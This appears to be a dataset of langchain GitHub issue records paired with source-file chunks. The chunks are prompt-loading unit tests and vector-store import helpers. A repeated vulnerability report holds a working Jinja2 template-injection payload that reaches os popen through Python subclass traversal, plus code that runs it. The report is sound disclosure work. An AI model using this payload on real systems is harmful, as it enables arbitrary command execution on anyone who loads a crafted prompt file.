"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading functionality."""
import os
from contextlib import contextmanager
from pathlib import Path
from typing import Iterator
from langchain.output_parsers import RegexParser
from langchain.prompts.few_shot import FewShotPromptTemplate
from langchain.prompts.loading import load_prompt
from langchain.prompts.prompt import PromptTemplate
EXAMPLE_DIR = Path("tests/unit_tests/examples").absolute()
@contextmanager
def change_directory(dir: Path) -> Iterator: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Change the working directory to the right folder."""
origin = Path().absolute()
try:
os.chdir(dir)
yield
finally:
os.chdir(origin)
def test_loading_from_YAML() -> None:
"""Test loading from yaml file."""
prompt = load_prompt(EXAMPLE_DIR / "simple_prompt.yaml")
expected_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
assert prompt == expected_prompt
def test_loading_from_JSON() -> None:
"""Test loading from json file."""
prompt = load_prompt(EXAMPLE_DIR / "simple_prompt.json")
expected_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
assert prompt == expected_prompt
def test_saving_loading_round_trip(tmp_path: Path) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test equality when saving and loading a prompt."""
simple_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
simple_prompt.save(file_path=tmp_path / "prompt.yaml")
loaded_prompt = load_prompt(tmp_path / "prompt.yaml")
assert loaded_prompt == simple_prompt
few_shot_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
few_shot_prompt.save(file_path=tmp_path / "few_shot.yaml")
loaded_prompt = load_prompt(tmp_path / "few_shot.yaml")
assert loaded_prompt == few_shot_prompt
def test_loading_with_template_as_file() -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading when the template is a file."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("simple_prompt_with_template_file.json")
expected_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_from_yaml() -> None:
"""Test loading few shot prompt from yaml."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt.yaml")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_from_json() -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading few shot prompt from json."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt.json")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_when_examples_in_config() -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading few shot prompt when the examples are in the config."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt_examples_in.json")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_example_prompt() -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading few shot when the example prompt is in its own file."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt_example_prompt.json")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_with_output_parser() -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | with change_directory(EXAMPLE_DIR):
prompt = load_prompt("prompt_with_output_parser.json")
expected_template = "Given the following question and student answer, provide a correct answer and score the student answer.\nQuestion: {question}\nStudent Answer: {student_answer}\nCorrect Answer:"
expected_prompt = PromptTemplate(
input_variables=["question", "student_answer"],
output_parser=RegexParser(
regex="(.*?)\nScore: (.*)",
output_keys=["answer", "score"],
),
template=expected_template,
)
assert prompt == expected_prompt |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | """**Vector store** stores embedded data and performs vector search.
One of the most common ways to store and search over unstructured data is to
embed it and store the resulting embedding vectors, and then query the store
and retrieve the data that are 'most similar' to the embedded query.
**Class hierarchy:**
.. code-block::
VectorStore --> <name> # Examples: Annoy, FAISS, Milvus
BaseRetriever --> VectorStoreRetriever --> <name>Retriever # Example: VespaRetriever
**Main helpers:**
.. code-block::
Embeddings, Document
"""
from typing import Any
from langchain.schema.vectorstore import VectorStore
def _import_alibaba_cloud_open_search() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.alibabacloud_opensearch import AlibabaCloudOpenSearch
return AlibabaCloudOpenSearch
def _import_alibaba_cloud_open_search_settings() -> Any:
from langchain.vectorstores.alibabacloud_opensearch import (
AlibabaCloudOpenSearchSettings,
)
return AlibabaCloudOpenSearchSettings
def _import_elastic_knn_search() -> Any:
from langchain.vectorstores.elastic_vector_search import ElasticKnnSearch
return ElasticKnnSearch
def _import_elastic_vector_search() -> Any:
from langchain.vectorstores.elastic_vector_search import ElasticVectorSearch
return ElasticVectorSearch
def _import_analyticdb() -> Any:
from langchain.vectorstores.analyticdb import AnalyticDB
return AnalyticDB
def _import_annoy() -> Any:
from langchain.vectorstores.annoy import Annoy
return Annoy
def _import_atlas() -> Any:
from langchain.vectorstores.atlas import AtlasDB
return AtlasDB
def _import_awadb() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.awadb import AwaDB
return AwaDB
def _import_azuresearch() -> Any:
from langchain.vectorstores.azuresearch import AzureSearch
return AzureSearch
def _import_bageldb() -> Any:
from langchain.vectorstores.bageldb import Bagel
return Bagel
def _import_cassandra() -> Any:
from langchain.vectorstores.cassandra import Cassandra
return Cassandra
def _import_chroma() -> Any:
from langchain.vectorstores.chroma import Chroma
return Chroma
def _import_clarifai() -> Any:
from langchain.vectorstores.clarifai import Clarifai
return Clarifai
def _import_clickhouse() -> Any:
from langchain.vectorstores.clickhouse import Clickhouse
return Clickhouse
def _import_clickhouse_settings() -> Any:
from langchain.vectorstores.clickhouse import ClickhouseSettings
return ClickhouseSettings
def _import_dashvector() -> Any:
from langchain.vectorstores.dashvector import DashVector
return DashVector
def _import_deeplake() -> Any:
from langchain.vectorstores.deeplake import DeepLake
return DeepLake
def _import_dingo() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.dingo import Dingo
return Dingo
def _import_docarray_hnsw() -> Any:
from langchain.vectorstores.docarray import DocArrayHnswSearch
return DocArrayHnswSearch
def _import_docarray_inmemory() -> Any:
from langchain.vectorstores.docarray import DocArrayInMemorySearch
return DocArrayInMemorySearch
def _import_elasticsearch() -> Any:
from langchain.vectorstores.elasticsearch import ElasticsearchStore
return ElasticsearchStore
def _import_epsilla() -> Any:
from langchain.vectorstores.epsilla import Epsilla
return Epsilla
def _import_faiss() -> Any:
from langchain.vectorstores.faiss import FAISS
return FAISS
def _import_hologres() -> Any:
from langchain.vectorstores.hologres import Hologres
return Hologres
def _import_lancedb() -> Any:
from langchain.vectorstores.lancedb import LanceDB
return LanceDB
def _import_llm_rails() -> Any:
from langchain.vectorstores.llm_rails import LLMRails
return LLMRails
def _import_marqo() -> Any:
from langchain.vectorstores.marqo import Marqo
return Marqo
def _import_matching_engine() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.matching_engine import MatchingEngine
return MatchingEngine
def _import_meilisearch() -> Any:
from langchain.vectorstores.meilisearch import Meilisearch
return Meilisearch
def _import_milvus() -> Any:
from langchain.vectorstores.milvus import Milvus
return Milvus
def _import_momento_vector_index() -> Any:
from langchain.vectorstores.momento_vector_index import MomentoVectorIndex
return MomentoVectorIndex
def _import_mongodb_atlas() -> Any:
from langchain.vectorstores.mongodb_atlas import MongoDBAtlasVectorSearch
return MongoDBAtlasVectorSearch
def _import_myscale() -> Any:
from langchain.vectorstores.myscale import MyScale
return MyScale
def _import_myscale_settings() -> Any:
from langchain.vectorstores.myscale import MyScaleSettings
return MyScaleSettings
def _import_neo4j_vector() -> Any:
from langchain.vectorstores.neo4j_vector import Neo4jVector
return Neo4jVector
def _import_opensearch_vector_search() -> Any:
from langchain.vectorstores.opensearch_vector_search import OpenSearchVectorSearch
return OpenSearchVectorSearch
def _import_pgembedding() -> Any:
from langchain.vectorstores.pgembedding import PGEmbedding
return PGEmbedding
def _import_pgvector() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.pgvector import PGVector
return PGVector
def _import_pinecone() -> Any:
from langchain.vectorstores.pinecone import Pinecone
return Pinecone
def _import_qdrant() -> Any:
from langchain.vectorstores.qdrant import Qdrant
return Qdrant
def _import_redis() -> Any:
from langchain.vectorstores.redis import Redis
return Redis
def _import_rocksetdb() -> Any:
from langchain.vectorstores.rocksetdb import Rockset
return Rockset
def _import_vespa() -> Any:
from langchain.vectorstores.vespa import VespaStore
return VespaStore
def _import_scann() -> Any:
from langchain.vectorstores.scann import ScaNN
return ScaNN
def _import_singlestoredb() -> Any:
from langchain.vectorstores.singlestoredb import SingleStoreDB
return SingleStoreDB
def _import_sklearn() -> Any:
from langchain.vectorstores.sklearn import SKLearnVectorStore
return SKLearnVectorStore
def _import_sqlitevss() -> Any:
from langchain.vectorstores.sqlitevss import SQLiteVSS
return SQLiteVSS
def _import_starrocks() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
